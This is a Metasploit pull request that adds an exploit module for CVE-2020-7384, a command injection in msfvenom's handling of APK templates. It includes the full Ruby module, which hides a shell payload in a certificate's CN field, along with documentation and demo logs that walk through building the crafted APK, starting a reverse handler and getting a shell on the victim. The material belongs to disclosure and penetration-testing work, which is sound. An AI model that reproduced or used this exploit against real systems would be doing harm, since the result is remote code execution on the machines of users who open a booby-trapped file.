### PR TITLE
Add metasploit_msfvenom_apk_template_cmd_injection

### DIFF
--- a/documentation/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.md
+++ b/documentation/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.md
@@ -13,9 +13,9 @@ A copy of the vulnerable software can be obtained by:
 * Using an old installer (e.g. <https://github.com/rapid7/metasploit-framework/releases/tag/6.0.11>); or
 * Setting up a dev environment (see <http://r-7.co/MSF-DEV>) and doing `git checkout 6.0.11`
 
-Note that the vulnerable code depends upon the `apktool` and `zipalign` tools.
-That is, regardless of the vulnerability, `msfvenom` needs these two binaries
-on the PATH for it to even support APK templates.
+Note that the vulnerable code depends upon the `apktool`, `zipalign` and
+`jarsigner` tools. That is, regardless of the vulnerability, `msfvenom` needs
+these binaries on the PATH for it to even support APK templates.
 
 Attempting to use `msfvenom` without these dependencies being installed:
 
@@ -27,10 +27,11 @@ Using APK template: /dev/null
 Error: apktool not found. If it's not in your PATH, please add it.
 ```
 
-These dependencies are available in Debian's standard repos:
+These dependencies are available in Debian's standard repos with `jarsigner`
+being provided by `openjdk`.
 
 ```
-% sudo apt update && sudo apt install apktool zipalign
+% sudo apt update && sudo apt install apktool zipalign default-jdk-headless
 <... SNIP ...>
 
 % msfvenom -p android/meterpreter/reverse_tcp -x /dev/null -o /dev/null

--- a/documentation/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.md
+++ b/documentation/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.md
@@ -1,0 +1,127 @@
+## Vulnerable Application
+
+Metasploit Framework's `msfvenom` is vulnerable to a command injection
+vulnerability when the user provides a crafted APK file to use as an Android
+payload template. A "template" file in this context is an existing APK file,
+within which an Android payload will be embedded.
+
+The vulnerability affects Metasploit Framework <= 6.0.11 and Metasploit Pro <=
+4.18.0
+
+A copy of the vulnerable software can be obtained by:
+
+* Using an old installer (e.g. <https://github.com/rapid7/metasploit-framework/releases/tag/6.0.11>); or
+* Setting up a dev environment (see <http://r-7.co/MSF-DEV>) and doing `git checkout 6.0.11`
+
+Note that the vulnerable code depends upon the `apktool` and `zipalign` tools.
+That is, regardless of the vulnerability, `msfvenom` needs these two binaries
+on the PATH for it to even support APK templates.
+
+Attempting to use `msfvenom` without these dependencies being installed:
+
+```
+% msfvenom -p android/meterpreter/reverse_tcp -x /dev/null -o /dev/null
+Using APK template: /dev/null
+[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
+[-] No arch selected, selecting arch: dalvik from the payload
+Error: apktool not found. If it's not in your PATH, please add it.
+```
+
+These dependencies are available in Debian's standard repos:
+
+```
+% sudo apt update && sudo apt install apktool zipalign
+<... SNIP ...>
+
+% msfvenom -p android/meterpreter/reverse_tcp -x /dev/null -o /dev/null
+Using APK template: /dev/null
+[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
+[-] No arch selected, selecting arch: dalvik from the payload
+Error: undefined method `[]' for nil:NilClass
+```
+
+The environment is now ready.
+
+## Verification Steps
+
+1. Install the vulnerable application
+2. Start `msfconsole`
+3. Do: `use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection`
+4. Set the payload and payload options as appropriate
+5. Do: `exploit`
+6. Start a handler
+7. Transfer the generated `msf.apk` file to the machine running the vulnerable application
+8. On the victim machine, do `msfvenom -p android/meterpreter/reverse_tcp -x msf.apk`
+9. You should get a shell
+
+Note: Due to the nature of the vulnerability, `bash` payloads are unlikely to
+work. If you attempt to use them you will get a warning message when doing
+`exploit`.
+
+```
+msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
+
+[!] Warning: bash payloads are unlikely to work
+[+] msf.apk stored at /home/justin/.msf4/local/msf.apk
+```
+
+## Options
+
+* `FILENAME` - the name of the APK file to produce. Note that it is safe to rename a file after it has been generated.
+
+## Scenarios
+
+### Metasploit Framework v6.0.11
+
+Generate the APK file
+
+```
+msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 172.18.0.3
+LHOST => 172.18.0.3
+msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
+
+[+] msf.apk stored at /home/justin/.msf4/local/msf.apk
+```
+
+Start a handler
+
+```
+msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set LHOST 172.18.0.3
+LHOST => 172.18.0.3
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > exploit
+
+[*] Started reverse TCP handler on 172.18.0.3:4444
+```
+
+As the victim, use `msfvenom` to generate an Android payload using the
+generated file as a template
+
+```
+% ./msfvenom -p android/meterpreter/reverse_tcp -x /home/justin/.msf4/local/msf.apk -o /dev/null
+Using APK template: /home/justin/.msf4/local/msf.apk
+[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
+[-] No arch selected, selecting arch: dalvik from the payload
+[*] Creating signing key and keystore..
+[*] Decompiling original APK..
+[*] Decompiling payload APK..
+Error: No such file or directory @ rb_sysopen - /tmp/d20201025-4916-ewjqfp/original/AndroidManifest.xml
+```
+
+A shell session will be opened
+
+```
+[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.3:56220) at 2020-10-25 22:13:43 +1100
+
+id
+uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)
+```

--- a/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
+++ b/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip/jar'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Metasploit Framework's msfvenom
+          payload generator when using a crafted APK file as an Android payload template. Affects
+          Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this
+          module is a relatively empty yet valid-enough APK file. To trigger the vulnerability,
+          the victim user should do the following:
+
+          msfvenom -p android/<...> -x <crafted_file.apk>
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Justin Steven'   # @justinsteven
+          ],
+        'References' =>
+          [
+            ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'],
+            ['CVE', '2020-7384'],
+          ],
+        'DefaultOptions' =>
+          {
+            'DisablePayloadHandler' => true
+          },
+        'Arch' => ARCH_CMD,
+        'Platform' => 'unix',
+        'Payload' => {
+            'BadChars' => "\x22\x2c\x5c\x0a\x0d"
+        },
+        'Targets' => [[ 'Automatic', {}]],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-10-29'
+      )
+    )
+    register_options([
+      OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk'])
+    ])
+  end
+
+  def build_x509_name
+    name = "CN=';(#{payload.encoded}) >&- 2>&- & #"
+    OpenSSL::X509::Name.parse(name)
+  end
+
+  def generate_signing_material
+    key = OpenSSL::PKey::RSA.new(2048)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = cert.issuer = build_x509_name
+    cert.public_key = key.public_key
+    cert.not_before = Time.now
+    # FIXME: this will break in the year 2037 on 32-bit systems
+    cert.not_after = cert.not_before + 3600 * 24 * 365 # 1 year
+    # Self-sign the certificate, otherwise the victim's keytool gets unhappy
+    cert.sign(key, OpenSSL::Digest::SHA256.new)
+
+    [cert, key]
+  end
+
+  def exploit
+    print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash')
+    apk = Rex::Zip::Jar.new
+    apk.build_manifest
+    cert, key = generate_signing_material
+    apk.sign(key, cert)
+    data = apk.pack
+    file_create(data)
+  end
+end

--- a/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
+++ b/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cert.public_key = key.public_key
     cert.not_before = Time.now
     # FIXME: this will break in the year 2037 on 32-bit systems
-    cert.not_after = cert.not_before + 3600 * 24 * 365 # 1 year
+    cert.not_after = cert.not_before + 1.year
     # Self-sign the certificate, otherwise the victim's keytool gets unhappy
     cert.sign(key, OpenSSL::Digest::SHA256.new)
 


### PR DESCRIPTION
Adds a module that exploits #14288 (CVE-2020-7384)

## Questions

The vulnerability is a `system()`-like injection (i.e. `sh` injection). The module throws a warning if you try to use a `bash` payload. Should this warning be an error, or can/should we prevent the use of `bash`-type paloads?

## Verification Steps

- [ ] Install the vulnerable application (see documentation)
- [ ] Start `msfconsole`
- [ ] Do: `use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection`
- [ ] Set the payload and payload options as appropriate
- [ ] Do: `exploit`
- [ ] Start a handler
- [ ] Transfer the generated `msf.apk` file to the machine running the vulnerable application
- [ ] On the victim machine, do `msfvenom -p android/meterpreter/reverse_tcp -x msf.apk`
- [ ] You should get a shell

Note: Due to the nature of the vulnerability, `bash` payloads are unlikely to work. If you attempt to use them you will get a warning message when doing `exploit`.

```
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[!] Warning: bash payloads are unlikely to work
[+] msf.apk stored at /home/justin/.msf4/local/msf.apk
```

## Demo

Generate the APK file

```
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 172.18.0.3
LHOST => 172.18.0.3
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /home/justin/.msf4/local/msf.apk
```

Start a handler

```
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.18.0.3
LHOST => 172.18.0.3
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.18.0.3:4444
```

As the victim, use `msfvenom` to generate an Android payload using the
generated file as a template

```
% ./msfvenom -p android/meterpreter/reverse_tcp -x /home/justin/.msf4/local/msf.apk -o /dev/null
Using APK template: /home/justin/.msf4/local/msf.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /tmp/d20201025-4916-ewjqfp/original/AndroidManifest.xml
```

A shell session will be opened

```
[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.3:56220) at 2020-10-25 22:13:43 +1100

id
uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)
```